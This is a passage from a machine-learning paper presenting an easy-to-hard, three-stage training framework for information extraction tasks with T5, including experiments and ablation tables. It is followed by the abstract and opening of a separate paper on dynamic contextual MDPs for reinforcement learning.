\(\{(c_{i},a_{i},o_{i},p_{i})\}\) quadruplets, where \(c_{i}\in\mathcal{C}_{absa}\) is \(i\)-th aspect category, \(a_{i}\) is \(i\)-th aspect term, \(o_{i}\) is \(i\)-th opinion term, both \(a_{i}\) and \(o_{i}\) are continuous spans in \(T\), \(p_{i}\in\{\text{positive, negative, neutral}\}\) is \(i\)-th sentiment polarity, and \(\mathcal{C}_{absa}\) is the aspect category set. ## 3 Our E2H Framework Our proposed easy-to-hard (E2H) framework consists of three sequential stages: the easy stage, the hard stage, and the main stage. In this section, we first introduce our text-to-structure formulation for facilitating three-stage learning in a unified framework. Next, we will describe how to realize the easy and hard stages. Finally, we will discuss the main stage as well as the detailed training and inference process of our framework. ### Unified Text-to-Structure Formulation Similar to UIE Lu et al. (2022), we formulate NER, RE, EE, and ABSA as text-to-structure generation problems, which allows us to use a single model to tackle multiple tasks. Given a text \(T\) and its corresponding prompt \(P\), we aim to generate the target IE structure \(S\) with an encoder-decoder model \(M:(P,T)\to S\). To facilitate the learning of different stages, we design the prompt \(P\) containing three types of information: Hint, Constraint, and Schema. 
Hint guides the model on what elements should be extracted, Constraint indicates specific constraints for the task, and Schema provides necessary information such as the possible relation set for the extraction. With these three types of information, the prompt is able to connect the learning process in different stages. Taking the RE task as an example, as depicted in Figure 1, Hint consists of one or both of an entity hint and a relation hint. The entity hint, represented by the special token [HE], guides the model to extract entities, and the relation hint, represented by the special token [HR], guides the model to extract relations. The use of both hints guides the model to extract both entity and relation information, in the form of (head entity, relation, tail entity) triplets. Constraint is a specific entity or relation, which limits the target structure to be related to that entity or relation. Lastly, Schema contains pre-defined entity categories or relations or both of them, depending on the information that needs to be extracted. It provides essential information for identifying entities and relations in a text.

### The Easy Stage

The goal of the easy stage is to enable the model to learn basic skills that will aid in tackling the main task. To achieve this, we identify several skills for each task and automatically construct the training data for them based on the data of the main task.

Figure 1: Overview of E2H consisting of three stages, i.e., the easy stage, the hard stage, and the main stage. We highlight Hint in red, Constraint in brown, and Schema in blue.

Table 1 presents the basic skills of NER, RE, EE, ASTE, and ASQP. We design each skill to be a sub-task of the main task according to its target structure. These skills are more fundamental and well-defined. Combining these skills gives the model a whole picture of how to tackle the main task. For example, the RE task has four skills. Skill\({}_{1}\) and Skill\({}_{3}\) help the model recognize substructures of the relational triplet, i.e., the entity and relation, respectively, and Skill\({}_{2}\) and Skill\({}_{4}\) help the model learn the dependencies between these substructures.

To construct the training data for each skill, we modify the input and target of the main task's training data. Specifically, the input text is the same for the skills and the main task, but the prompt is different. As shown in Figure 1, for the RE task, there is only [HE] in the hint of Skill\({}_{1}\) as it only extracts entities and only [HR] in the hint of Skill\({}_{3}\) as it only extracts relations. Both [HE] and [HR] are in the hints of Skill\({}_{2}\), Skill\({}_{4}\), and the main task because they extract (head entity, relation, tail entity) triplets. For Skill\({}_{2}\) and Skill\({}_{4}\), there is also a Constraint, i.e., a head entity or relation, which requires their targets to be triplets related to a specific head entity or relation. The schema of the RE task consists of both entity categories and relations. For a specific skill of RE, the schema only contains entity categories or relations. The target of each skill is a part of the target of the RE task. For Skill\({}_{1}\) and Skill\({}_{3}\), which extract a substructure of the relational triplet, we use the substructure as the target. For Skill\({}_{2}\) and Skill\({}_{4}\), we use the corresponding subset of triplets of the RE task as the target.
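To make the construction concrete, the sketch below derives the four RE skill instances of the easy stage from a single main-task example. It is only illustrative: the exact prompt strings, special tokens, and the choice of which schema accompanies which skill are assumptions rather than the released implementation.

```python
# Rough sketch: build easy-stage RE skill instances from one main-task example.
# Each instance is a (prompt, text, target) triple for the text-to-structure model.
def build_easy_stage(text, triplets, entity_types, relations):
    """triplets: list of ((head, head_type), relation, (tail, tail_type))."""
    instances = []
    # Skill 1: entity hint only -> extract the entities (a substructure of the triplet).
    entities = sorted({h for h, _, _ in triplets} | {t for _, _, t in triplets})
    instances.append(("[HE] " + " ".join(entity_types), text, entities))
    # Skill 2: both hints plus a head-entity constraint -> triplets with that head.
    for head in sorted({h for h, _, _ in triplets}):
        target = [tr for tr in triplets if tr[0] == head]
        instances.append((f"[HE] [HR] {head[0]} " + " ".join(relations), text, target))
    # Skill 3: relation hint only -> extract the set of relations.
    instances.append(("[HR] " + " ".join(relations), text,
                      sorted({r for _, r, _ in triplets})))
    # Skill 4: both hints plus a relation constraint -> triplets with that relation.
    for rel in sorted({r for _, r, _ in triplets}):
        target = [tr for tr in triplets if tr[1] == rel]
        instances.append((f"[HE] [HR] {rel} " + " ".join(entity_types), text, target))
    return instances
```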
### The Hard Stage The hard stage aims to construct training examples that are harder than the original training examples of the main task to train the model. Intuitively, the training instance is harder if the input text contains more structural elements and more complicated contexts. To this end, we combine two training instances of the original task to construct a harder instance. Formally, given two training instances \((P,T_{1},S_{1})\) and \((P,T_{2},S_{2})\), we can construct a harder training instance \((P,T_{1}\circ T_{2},S_{1}\circ S_{2})\), where \(P\) is the prompt, \(T_{i}\) is the \(i\)-th text, \(S_{i}\) is the \(i\)-th target structure, and \(\circ\) denotes concatenation. An example is shown in the hard stage part of the RE task in Figure 1. The model has to process and understand the combined information from both instances, making it more challenging for the model to correctly extract the target structure. Let \(N\) denote the number of training examples of the original task. For each training example, we randomly sample \(M\) training examples whose target structures are not empty to construct \(M\) hard instances. This results in a total of \(N*M\) hard instances. This approach allows us to easily construct a large amount of diverse hard training data. \begin{table} \begin{tabular}{l l} \hline \hline **Task** & **Basic Skills** \\ \hline NER & \(\textit{Skill}_{1}\): \(T\rightarrow\) a set of entity categories \(\{c_{i}\}\) \\ & \(\textit{Skill}_{2}\): \(T\) and an entity category constraint \(c\rightarrow\) a set of entities of \(c\)\(\{(e_{i},c)\}\) \\ \hline \multirow{3}{*}{RE} & \(\textit{Skill}_{1}\): \(T\rightarrow\) a set of entities \(\{(e_{i},c_{i})\}\) \\ & \(\textit{Skill}_{2}\): \(T\) and a head entity constraint \((e^{h},c^{h})\rightarrow\) a set of relational triplets \(\{((e^{h},c^{h}),r_{i},e_{i}^{t})\}\) \\ & \(\textit{Skill}_{3}\): \(T\rightarrow\) a set of relations \(\{r_{i}\}\) \\ & \(\textit{Skill}_{4}\): \(T\) and a relation constraint \(r\rightarrow\) a set of relational triplets \(\{((e_{i}^{h},c_{i}^{h}),r,e_{i}^{t})\}\) \\ \hline \multirow{3}{*}{EE} & \(\textit{Skill}_{1}\): \(T\rightarrow\) a set of event triggers \(\{(e_{i}^{tri},c_{i}^{tri})\}\) \\ & \(\textit{Skill}_{2}\): \(T\) and a trigger constraint \((e^{tri},c^{tri})\rightarrow\) the event \(((e^{tri},c^{tri}),(e^{arg_{1}},c^{arg_{1}}),\cdots,(e^{arg_{m}},c^{arg_{m}}))\) \\ \hline \multirow{3}{*}{ASTE} & \(\textit{Skill}_{1}\): \(T\rightarrow\) a set of aspect terms \(\{a_{i}\}\) and a set of opinion terms \(\{o_{i}\}\) \\ & \(\textit{Skill}_{2}\): \(T\) and an aspect term constraint \(a\rightarrow\) a set of triplets \(\{(a,o_{i},p_{i})\}\) \\ & \(\textit{Skill}_{3}\): \(T\rightarrow\) a set of sentiment polarities \(\{p_{i}\}\) \\ & \(\textit{Skill}_{4}\): \(T\) and a sentiment polarity constraint \(p\rightarrow\) a set of triplets \(\{(a_{i},o_{i},p)\}\) \\ \hline \multirow{3}{*}{ASQP} & \(\textit{Skill}_{1}\): \(T\rightarrow\) a set of aspect categories \(\{c_{i}\}\) \\ & \(\textit{Skill}_{2}\): \(T\rightarrow\) a set of (aspect category, aspect term) tuples \(\{(c_{i},a_{i})\}\) \\ & \(\textit{Skill}_{3}\): \(T\rightarrow\) a set of (aspect category, opinion term) tuples \(\{(c_{i},o_{i})\}\) \\ & \(\textit{Skill}_{4}\): \(T\rightarrow\) a set of (aspect category, sentiment polarity) tuples \(\{(c_{i},p_{i})\}\) \\ \hline \hline \end{tabular} \end{table} Table 1: Basic skills for NER, RE, EE, ASTE, and ASQP. We omit Hint and Schema for simplicity. 
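The pairing operation described in the hard stage above is straightforward to implement; a minimal sketch, with illustrative function and field names rather than the released code, is given below.

```python
import random

# Rough sketch of the hard stage: pair each example with M sampled examples whose
# targets are non-empty, concatenating both the texts and the target structures.
def build_hard_stage(examples, M, seed=0):
    """examples: list of (prompt, text, target); target is a list of tuples."""
    rng = random.Random(seed)
    nonempty = [ex for ex in examples if ex[2]]
    hard = []
    for prompt, text, target in examples:
        for _ in range(M):
            _, text2, target2 = rng.choice(nonempty)
            hard.append((prompt, text + " " + text2, target + target2))
    return hard  # N * M harder instances in total
```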
Detailed examples are in Appendix A.3.

### The Main Stage

After training the model in the easy and hard stages, we train the model with the main task in this stage.

Training. We adopt the pre-trained sequence-to-sequence model T5 (Raffel et al., 2020) as the backbone of E2H. The model is trained with a maximum likelihood objective. Given the training example \((P,T,S)\), the loss function \(L_{\theta}\) is defined as \[L_{\theta}=-\sum_{i=1}^{n}\log P_{\theta}\left(S_{i}\mid S_{<i},P,T\right) \tag{1}\] where \(\theta\) denotes the model parameters, \(P\) is the prompt, \(T\) is the text, \(S\) is the target structure, and \(n\) is the length of \(S\). We train the model in the easy, hard, and main stages sequentially. For the easy stage, we adopt the weights of pre-trained T5 to initialize the model. For the hard and main stages, we initialize the model with the weights of the model trained in the previous stage.

Inference. Once the training process is complete, we use the model trained in the main stage to generate the target structure \(S\) for any given tuple of the prompt and text \((P,T)\). Although our training process has three stages, the inference is a one-stage process. The computational load is the same as that of the one-stage learning counterpart.

## 4 Experiments

### Experimental Setup

Datasets. We conduct experiments on 17 datasets across four IE tasks, i.e., NER, RE, EE, and ABSA. We evaluate the flat NER task with CoNLL03 (Tjong Kim Sang and De Meulder, 2003), and the nested NER task with ACE04-Ent (Mitchell et al., 2005) and ACE05-Ent (Walker et al., 2006). For RE, we experiment on CoNLL04 (Roth and Yih, 2004), ACE05-Rel (Walker et al., 2006), and SciERC (Luan et al., 2018). For EE, we use ACE05E, ACE05E+ (Walker et al., 2006), and CASIE (Satyapanich et al., 2020). As for ABSA, we consider the ASTE and ASQP tasks. For ASTE, we adopt four popular datasets, including Rest14, Laptop14, Rest15, and Rest16 provided by Xu et al. (2020). For ASQP, we use R-ACOS and L-ACOS provided by Cai et al. (2021), and Rest15 and Rest16 provided by Zhang et al. (2021). These ABSA datasets are derived from the datasets provided by the SemEval ABSA challenges (Pontiki et al., 2014, 2015, 2016), except L-ACOS, which is collected from the Amazon Laptop domain. Statistics of these datasets are provided in Appendix A.1.

Evaluation. We use Micro-F1 as the primary evaluation metric. For each experimental result, we report the average performance over three random seeds. For NER, RE, EE, and ASTE, we follow Lu et al. (2022) to use Entity F1, Relation Strict F1, Event Trigger F1 and Argument F1, and Sentiment Triplet F1 as the evaluation metrics and map the generated string-level extraction results to offset-level for evaluation. For ASQP, we follow Zhang et al. (2021) to use Sentiment Quad F1 to evaluate the model. A sentiment quad is correct if and only if the four elements are exactly the same as those in the gold sentiment quad.

Baselines. We divide our baselines into two categories: specialized models and unified models. Specialized models are designed for a particular IE task, while unified models are designed for general IE. For specialized models, we use state-of-the-art methods such as BARTNER (Yan et al., 2021) and DeBias (Zhang et al., 2022) for NER, UniRE (Wang et al., 2021) and PURE (Zhong and Chen, 2021) for RE, Text2Event (Lu et al., 2021) and DEGREE (Hsu et al., 2022) for EE, and PARAPHRASE (Zhang et al., 2021) and Seq2Path (Mao et al., 2022) for ABSA.
For unified models, we use TANL (Paolini et al., 2021), UIE (Lu et al., 2022), and LasUIE (Fei et al., 2022) as baselines. To make a fair comparison with one-stage learning methods, we also build T5-base and T5-large baselines. We set their inputs and outputs the same as those of E2H and only train them in the main stage. Implementation DetailsE2H has two model sizes: E2H-base and E2H-large, which are initialized with pre-trained T5-base and T5-large models (Raffel et al., 2020), respectively. Other details are reported in Appendix A.2. ### Main Results We compare E2H with state-of-the-art specialized and unified models. Tables 2-4 report the experimental results on 17 datasets across four IE tasks. We have the following observations: (1) E2H is an effective framework for various IE tasks. E2H-large achieves new state-of-the-art results on 13 out of 17 datasets. (2) The proposed easy-to-hard three-stage learning method consistently outperforms the one-stage learning counterpart. E2H performs better than T5 on all the datasets for two model sizes, \begin{table} \begin{tabular}{l c c c c c c c c c c} \hline \hline \multirow{2}{*}{**Models**} & \multicolumn{6}{c}{ASETE} & \multicolumn{6}{c}{ASQP} \\ \cline{2-11} & Rest14 Laptop14 Rest15 Rest16 & Avg & R-ACOS L-ACOS Rest15 Rest15 Rest16 & Avg \\ \hline _Specialized Models_ & & & & & & & & \\ PARAPHIRASE (Zhang et al., 2021) & 72.03 & 61.13 & 62.56 & 71.70 & 66.86 & - & - & 46.93 & 57.93 & - \\ Seq2Path (Mao et al., 2022) & 75.52 & 64.82 & 65.88 & 72.87 & 69.77 & 58.41 & 42.97 & - & - \\ \hline _Unified Models_ & & & & & & & & & \\ UIE\({}^{*}\)(Lu et al., 2022) & 74.52 & 63.88 & 67.15 & 75.07 & 70.16 & - & - & - & - \\ T5-base (Raffel et al., 2020) & 72.11 & 63.06 & 66.27 & 72.24 & 68.42 & 59.26 & 43.12 & 48.24 & 58.92 & 52.39 \\ T5-large (Raffel et al., 2020) & 73.48 & 63.62 & 67.08 & 74.85 & 69.76 & 61.24 & 44.37 & 51.76 & 60.93 & 54.58 \\ E2H-base & 75.40 & 65.78 & 68.58 & 73.83 & 70.90 & 60.66 & 43.51 & 49.45 & 59.55 & 53.29 \\ E2H-large & **75.92** & **65.98** & **68.80** & **75.46** & **71.54** & **63.50** & **44.51** & **52.39** & **61.86** & **55.57** \\ \hline \hline \end{tabular} \end{table} Table 4: Experimental results on two ABSA tasks, including the ASTE task and the ASQP task. The best results are in bold and the second-best results are underlined. Models marked with \(*\) conduct large-scale continued pre-training with external resources. Except for T5-base and T5-large, the results of baselines are taken from their original papers. 
\begin{table} \begin{tabular}{l c c c c c c c c} \hline \hline \multirow{2}{*}{**Models**} & \multicolumn{6}{c}{NER} & \multicolumn{6}{c}{RE} \\ \cline{2-11} & CoNLL03 & ACE04-Ent ACE05-Ent & Avg & CoNLL04 ACE05-Rel & SciERC & Avg \\ \hline _Specialized Models_ & & & & & & & \\ BARTNER (Yan et al., 2021) & **93.24** & 86.84 & 84.74 & 88.27 & - & - & - & - \\ DeBias (Zhang et al., 2022) & 93.12 & 85.28 & 84.93 & 87.78 & - & - & - & - \\ UniRE (Wang et al., 2021) & - & - & - & - & - & 64.30 & 36.90 & - \\ PURE (Zhong and Chen, 2021) & - & - & - & - & - & - & 64.80 & 36.80 & - \\ \hline _Unified Models_ & & & & & & & & \\ TANL (Paolini et al., 2021) & 91.70 & - & 84.90 & - & 71.40 & 63.70 & - & - \\ UIE\({}^{*}\)(Lu et al., 2022) & 92.99 & 86.89 & 85.78 & 88.55 & 75.00 & 66.06 & 36.53 & 59.20 \\ LasUIE\({}^{*}\)(Fei et al., 2022) & 93.20 & 86.80 & 86.00 & **88.67** & 75.30 & **66.40** & - & - \\ T5-base (Raffel et al., 2020) & 91.72 & 85.60 & 84.16 & 87.16 & 69.58 & 62.91 & 33.13 & 55.20 \\ T5-large (Raffel et al., 2020) & 92.05 & 86.78 & 85.76 & 88.20 & 71.72 & 64.49 & 35.44 & 57.21 \\ E2H-base & 91.92 & 86.24 & 84.83 & 87.66 & 72.23 & 65.44 & 35.06 & 57.58 \\ E2H-large & 92.43 & **87.06** & **86.25** & 88.58 & **75.31** & 66.21 & **39.00** & **60.17** \\ \hline \hline \end{tabular} \end{table} Table 2: Experimental results on the NER and RE tasks. The best results are in bold and the second-best results are underlined. Models marked with \(*\) conduct large-scale continued pre-training with external resources. Except for T5-base and T5-large, the results of baselines are taken from their original papers. \begin{table} \begin{tabular}{l c c c c c c c c} \hline \hline \multirow{2}{*}{**Models**} & \multicolumn{6}{c}{ACE05-E} & \multicolumn{6}{c}{ACE05-E+} & \multicolumn{6}{c}{CASIE} & \multicolumn{6}{c}{Avg} \\ \cline{2-11} & Trig F1 & Argu F1 & Trig F1 & Argu F1 & Trig F1 & Argu F1 & Trig F1 & Argu F1 \\ \hline _Specialized Models_ & & & & & & & & \\ Text2Event (Lu et al., 2021) & 71.90 & 53.80 & 71.80 & 54.40 & - & - & - & - \\ DEGREE (Hsu et al., 2022) & **73.30** & **55.80** & 70.90 & **56.30** & - & - & - & - \\ \hline _Unified Models_ & & & & & & & & \\ TANL (Paolini et al., 2021) & 68.40 & 47.60 & - & - & - & - & - & - \\ UIE\({}^{*}\)(Lu et al., 2022) & - & - & 73.36 & 54.79 & 69.33 & 61.30 & - & - \\ T5-base (Raffel et al., 2020) & 68.19 & 49.68 & 69.68 & 50.65 & 68.40 & 60.19 & 68.76 & 53.51 \\ T5-large (Raffel et al., 2020) & 70.40 & 52.42 & 71.45 & 54.08 & 69.29 & 60.98 & 70.38 & 55.83 \\ E2H-base & 70.12 & 50.98 & 69.99 & 52.85 & 68.45 & 60.40 & 69.52 & 54.74 \\ E2H-large & 72.19 & 53.85 & **73.50** & 55.67 & **69.58** & **61.96** & **71.76** & **57.16** \\ \hline \hline \end{tabular} \end{table} Table 3: Experimental results on the EE task. The best results are in bold and the second-best results are underlined. Models marked with \(*\) conduct large-scale continued pre-training with external resources. Except for T5-base and T5-large, the results of baselines are taken from their original papers. and E2H-large obtains an average improvement of 0.38, 2.96, 1.33, and 1.39 absolute points over T5-large on the NER, RE, EE, and ABSA tasks, respectively. This demonstrates the strong generalization ability of our framework. (3) Without using any external resources, our method exhibits comparable or stronger performance than models with large-scale continued pre-training. Compared with UIE Lu et al. 
(2022), which is pre-trained with large-scale structured, unstructured, and parallel data, E2H-large achieves better performance on the RE, EE, and ASTE tasks and obtains comparable results on the NER task. (4) Easy-to-hard learning brings more benefits to complex tasks than to simple tasks. Specifically, compared with the improvement on the NER task, which only extracts entities, the improvements of E2H over T5 are more significant on the other three tasks, which extract tuples with multiple elements. This shows that our method can help the model effectively capture the structural dependencies of complex structures. ### Low-Resource Results Our experiments in low-resource scenarios show that E2H is particularly effective when training data is limited. As shown in Figure 2, when training on a fraction (1%, 5%, and 10%) of the original data1, E2H-base significantly outperforms T5-base on all datasets. For example, with only 5% of the training data, E2H-base obtains an average of 7.1, 12.0, 6.4, and 8.2 absolute points of improvement over T5-base on ACE04-Ent, ACE05-Rel, ACE05-E, and Rest14, respectively. This highlights the effectiveness of our easy-to-hard learning framework when data is scarce. On one hand, the easy stage helps the model identify the substructures of the target structure and capture the dependencies among them, which is difficult with limited data. On the other hand, the hard stage provides diverse and harder data that help the model tackle broad-range variations of the task, which is especially important in low-resource scenarios. Footnote 1: We repeat each experiment three times with different samples and report their averaged results. ## 5 More Analysis **Analysis on different learning strategies.** In the main result tables, we report the results of E2H trained with the easy\(\rightarrow\)hard\(\rightarrow\)main strategy, i.e., training the model in the easy, hard, and main stages sequentially. In this section, we investigate alternative learning strategies. Table 6 reports the results of T5-base models trained with different learning strategies on four datasets across four tasks. We have the following observations: (1) The easy\(\rightarrow\)hard\(\rightarrow\)main strategy is the best among the seven strategies considered. It performs better than the other strategies on all datasets. (2) Easy-to-hard multi-stage learning outperforms multi-task learning (i.e., easy+main+hard). When the easy, main, and hard parts of the training data are all used, the easy\(\rightarrow\)hard\(\rightarrow\)main and easy\(\rightarrow\)main\(\rightarrow\)hard strategies show superiority over the easy+main+hard strategy on all datasets. This indicates that easy-to-hard multi-stage learning is essential to the model's performance. (3) Each stage is critical to our E2H framework. Removing any of the stages reduces the performance of E2H. (4) In general, three-stage learning is better than two-stage learning, which in turn is better than one-stage learning. Figure 2: Results of E2H-base and T5-base in low-resource scenarios. 
\begin{table} \begin{tabular}{l c c c c} \hline \hline \multirow{2}{*}{**Models**} & NER & RE & EE & ABSA \\ & ACE04-Ent & ACE05-Rel & ACE05-E & Rest14 \\ \hline E2H-base & **86.24** & **65.44** & **50.98** & **75.40** \\ w/o Skill\({}_{1}\) & 85.91 & 64.28 & 50.85 & 74.33 \\ w/o Skill\({}_{2}\) & 86.13 & 64.05 & 49.89 & 74.98 \\ w/o Skill\({}_{3}\) & - & 63.74 & - & 75.14 \\ w/o Skill\({}_{4}\) & - & 64.00 & - & 74.88 \\ \hline \hline \end{tabular} \end{table} Table 5: Ablation results of E2H-base regarding different skills in the easy stage. **Is each skill necessary in the easy stage?** To quantify the contribution of each skill, we examine the performance of E2H-base after removing a basic skill from training in the easy stage. Ablation results on four datasets across four tasks are shown in Table 5. Removing any skill degrades the performance of E2H on the main task, indicating that recognizing substructures and the dependencies between them is crucial to the model's performance. **Does easy-to-hard learning improve the model's cross-domain generalization ability?** To answer this question, we train the E2H-base and T5-base models on one dataset and evaluate them on another dataset from a different domain of the same task. Table 7 reports the cross-domain generalization performance of both models on two dataset pairs: CoNLL03\(\leftrightarrow\)ACE04-Ent for the NER task and Rest16\(\leftrightarrow\)Laptop14 for the ASTE task. E2H-base performs better than T5-base in all scenarios. This indicates that easy-to-hard learning can enhance the model's cross-domain generalization ability. ## 6 Related Work IE is a long-standing research area in natural language processing. Over the years, the paradigm for IE has undergone several transitions. Early approaches to IE focus on sequence labeling techniques McCallum and Li (2003); Ma and Hovy (2016); Zhang et al. (2018); Li et al. (2019); Zhang et al. (2021), in which each word in a text is assigned a label indicating its role in the extraction task. Span-based approaches Luan et al. (2019); Wang et al. (2020); Zhao et al. (2020); Xu et al. (2021); Zhou et al. (2022, 2023), which involve identifying spans in the text that correspond to the desired information, were later introduced for IE. MRC-based methods Du and Cardie (2020); Li et al. (2020); Mao et al. (2021); Xu et al. (2023), which frame the extraction task as a reading comprehension problem, and generation-based methods Yan et al. (2021); Lu et al. (2021); Zhang et al. (2021), which generate the extracted information directly from the text, have gained popularity in recent years and have been shown to be more effective and flexible. Most of these methods target a specific IE task. There have been some efforts to develop unified IE methods Paolini et al. (2021); Lu et al. (2022); Fei et al. (2022), which can unify various IE tasks within one framework. Our E2H framework, a unified IE framework, introduces a novel easy-to-hard learning paradigm for IE to reduce the gap between model and human learning. From the perspective of improving the learning process, E2H shares a similar spirit with transfer learning Pan and Yang (2010), which uses the knowledge gained from solving one task to help solve another related task. By comparison, E2H learns basic skills specifically designed to assist with the target task. E2H is also related to curriculum learning Bengio et al. (2009); Wang et al. (2022) in its fundamental motivation of learning from easy to hard. 
\begin{table} \begin{tabular}{l c c c c c c} \hline \hline \multirow{2}{*}{**Learning Strategy**} & \multirow{2}{*}{**Type**} & NER & RE & EE & ABSA & \multirow{2}{*}{Avg} \\ & & ACE04-Ent & ACE05-Rel & ACE05-E & Rest14 & \\ \hline easy\(\rightarrow\)hard\(\rightarrow\)main & three-stage & **86.24** & **65.44** & **50.98** & **75.40** & **69.52** \\ easy\(\rightarrow\)main\(\rightarrow\)hard & three-stage & 86.23 & 65.40 & 49.76 & 74.45 & 68.96 \\ easy+main+hard & multi-task & 86.10 & 64.46 & 49.16 & 73.94 & 68.42 \\ easy\(\rightarrow\)main & two-stage & 85.93 & 63.85 & 50.31 & 74.52 & 68.65 \\ hard\(\rightarrow\)main & two-stage & 85.99 & 64.41 & 49.26 & 74.67 & 68.58 \\ easy\(\rightarrow\)hard & two-stage & 86.18 & 65.35 & 46.69 & 75.34 & 68.39 \\ main & one-stage & 85.60 & 62.91 & 49.68 & 72.11 & 67.58 \\ \hline \hline \end{tabular} \end{table} Table 6: Experimental results of T5-base models trained with different learning strategies. The easy+main+hard strategy means that the model is trained on the easy, main, and hard parts in a multi-task learning manner. The arrow \(\rightarrow\) indicates the order between different stages. \begin{table} \begin{tabular}{l c c} \hline \hline **Models** & CoNLL03\(\rightarrow\)ACE04-Ent & ACE04-Ent\(\rightarrow\)CoNLL03 \\ \hline T5-base & 19.54 & 17.45 \\ E2H-base & **19.71** & **30.08** \\ \hline **Models** & Rest16\(\rightarrow\)Laptop14 & Laptop14\(\rightarrow\)Rest16 \\ \hline T5-base & 42.37 & 60.50 \\ E2H-base & **44.86** & **62.32** \\ \hline \hline \end{tabular} \end{table} Table 7: Cross-domain generalization performance of E2H-base and T5-base. Curriculum learning, inspired by the human learning process, presents examples starting from the easiest samples and then gradually introduces more complex ones. However, curriculum learning involves the intricate task of ordering instances by difficulty. This requires a reliable difficulty criterion or ranking system, which can be challenging to define and often necessitates substantial human effort. In contrast, E2H emphasizes mastering certain fundamental skills prior to tackling more intricate tasks, eliminating the need for a difficulty criterion. This approach can be particularly beneficial in scenarios where the target task requires a distinct set of skills, or when the learning setting does not naturally provide a straightforward measure of difficulty. ## 7 Conclusion This paper proposes an easy-to-hard learning framework consisting of the easy stage, the hard stage, and the main stage for IE. Two novel strategies are proposed to build the easy and hard parts of the framework to enable the learning process. Experimental results in both full and low-resource scenarios demonstrate the effectiveness of our framework and its superiority over one-stage learning methods. ## Limitations While the results have shown the effectiveness of our framework for IE without using any additional resources, we did not explore the potential enhancement from utilizing existing resources in the easy-to-hard learning process. On one hand, we could build the easy stage with the help of existing data from simpler tasks. On the other hand, data from harder tasks could be used for the hard stage. Enhancing the E2H framework by effectively using existing resources is an interesting and promising direction. Another limitation is that we did not extensively explore the possible skill sets for each task. Exploring more approaches to obtain the skill sets is also open for future research. 
We plan to investigate these possibilities in our future work.
2302.02061
Reinforcement Learning with History-Dependent Dynamic Contexts
We introduce Dynamic Contextual Markov Decision Processes (DCMDPs), a novel reinforcement learning framework for history-dependent environments that generalizes the contextual MDP framework to handle non-Markov environments, where contexts change over time. We consider special cases of the model, with a focus on logistic DCMDPs, which break the exponential dependence on history length by leveraging aggregation functions to determine context transitions. This special structure allows us to derive an upper-confidence-bound style algorithm for which we establish regret bounds. Motivated by our theoretical results, we introduce a practical model-based algorithm for logistic DCMDPs that plans in a latent space and uses optimism over history-dependent features. We demonstrate the efficacy of our approach on a recommendation task (using MovieLens data) where user behavior dynamics evolve in response to recommendations.
Guy Tennenholtz, Nadav Merlis, Lior Shani, Martin Mladenov, Craig Boutilier
2023-02-04T01:58:21Z
http://arxiv.org/abs/2302.02061v2
# Reinforcement Learning with History-Dependent Dynamic Contexts ###### Abstract We introduce _Dynamic Contextual Markov Decision Processes (DCMDPs)_, a novel reinforcement learning framework for history-dependent environments that generalizes the contextual MDP framework to handle non-Markov environments, where contexts change over time. We consider special cases of the model, with a focus on _logistic DCMDPs_, which break the exponential dependence on history length by leveraging aggregation functions to determine context transitions. This special structure allows us to derive an upper-confidence-bound style algorithm for which we establish regret bounds. Motivated by our theoretical results, we introduce a practical model-based algorithm for logistic DCMDPs that plans in a latent space and uses optimism over history-dependent features. We demonstrate the efficacy of our approach on a recommendation task (using MovieLens data) where user behavior dynamics evolve in response to recommendations. Machine Learning, ICML ## 1 Introduction Reinforcement learning (RL) is a paradigm in which an agent learns to act in an environment to maximize long-term reward. RL has been applied to numerous domains, including recommender systems, robot control, video games, and autonomous vehicles (Afsar et al., 2022; Tessler et al., 2019; Mnih et al., 2015; Fayijie et al., 2018). While typical RL approaches rely on a Markov property of both the reward process and environment dynamics, many scenarios are inherently history-dependent (Bacchus et al., 1996; Ronca and Giacomo, 2021), particularly, when humans are involved. As one example, the behavior of users in recommender systems often exhibits non-Markovian characteristics reflective of a user's latent state, including: user preference elicitation sessions, where users respond to a sequence of feedback-gathering interventions (e.g., ratings, comparisons, annotations) (Chen and Pu, 2012; Zhao et al., 2013); user _ad blindness_ (i.e., the tendency to gradually ignore ads) (Hohnhold et al., 2015); and the long-term evolution of user satisfaction (Wilhelm et al., 2018; Mladenov et al., 2019). Many aspects of a user's latent state determine their disposition towards specific actions. For example, a user's level of frustration, trust, receptivity, and overall satisfaction, may affect their tendency toward accepting recommendations, providing feedback, or abandoning a session. Notably, such features are cumulatively impacted by the user's long-term history, which makes RL especially challenging due to difficult credit assignment, where the impact of any individual action is usually small and noisy. 1 Footnote 1: A similar problem occurs in medical settings, where a patient’s previous reactions to certain treatments could implicitly affect the physician’s receptivity for treatment recommendations over long horizons. Another example includes human driver interventions in autonomous vehicles, where humans may take control of a vehicle for short periods of time. In this paper, we introduce _Dynamic Contextual Markov Decision Processes (DCMDPs)_ to model such environment dynamics in a _history-dependent contextual_ fashion. DCMDPs decompose the state space to include dynamic history-dependent contexts, where each context represents a different MDP, e.g., preferences of a human interacting with an agent, being affected by previous interactions. 
Particularly, we introduce a special class of _logistic DCMDPs_, in which context dynamics are determined by the aggregation of a set of feature vectors--functions of the immediate context, state and action--over time. This model is inspired by various psychological studies of human learning and conditioning; in particular, the Rescorla-Wagner (RW) model (Rescorla, 1972), a neuroscience model which describes the diminishing impact of repeated exposure to a stimulus due to historical conditioning. Critically, this structure allows us to develop tractable, UCB-style algorithms (Auer et al., 2008) for logistic DCMDPs that break the exponential dependence on history length in general DCMDPs. Our contributions are as follows: (1) We introduce DCMDPs, a model that captures non-Markov context dynamics. (2) We introduce a subclass of DCMDPs for which state-action-context features are aggregated over time to determine context dynamics. We show how such problems can be solved by devising sample efficient and computationally tractable solutions, for which we establish regret bounds. (3) Inspired by our theoretical results, we construct a practical algorithm, based on MuZero (Schrittwieser et al., 2020), and demonstrate its effectiveness on a recommendation system benchmark with long history-dependent contexts. ## 2 Dynamic Contextual MDPs We begin by defining _Dynamic Contextual MDPs (DCMDPs)_, a general framework for modeling history-dependent contexts2. Let \(\mathcal{S}\), \(\mathcal{A}\) and \(\mathcal{X}\) be state, action, and context spaces, with cardinalities \(S,A,X\), respectively. For any time \(t\geq 1\), let \(\mathcal{H}_{t}=\{(s_{1},a_{1},x_{1},\ldots,s_{t},a_{t-1},x_{t-1})\}\) be the set of histories up to time \(t\); and let \(\mathcal{H}=\bigcup_{t}\mathcal{H}_{t}\). We denote \((s_{0},a_{0},x_{0})=\emptyset\). Footnote 2: The term “context”, as opposed to “state”, differentiates between the Markov part of the state and the history dependent part of the state. Additionally, contexts often quantify characteristics of the environment (e.g., types of humans-in-the-loop), which can evolve in a distinct fashion, in contrast to the rest of the state. 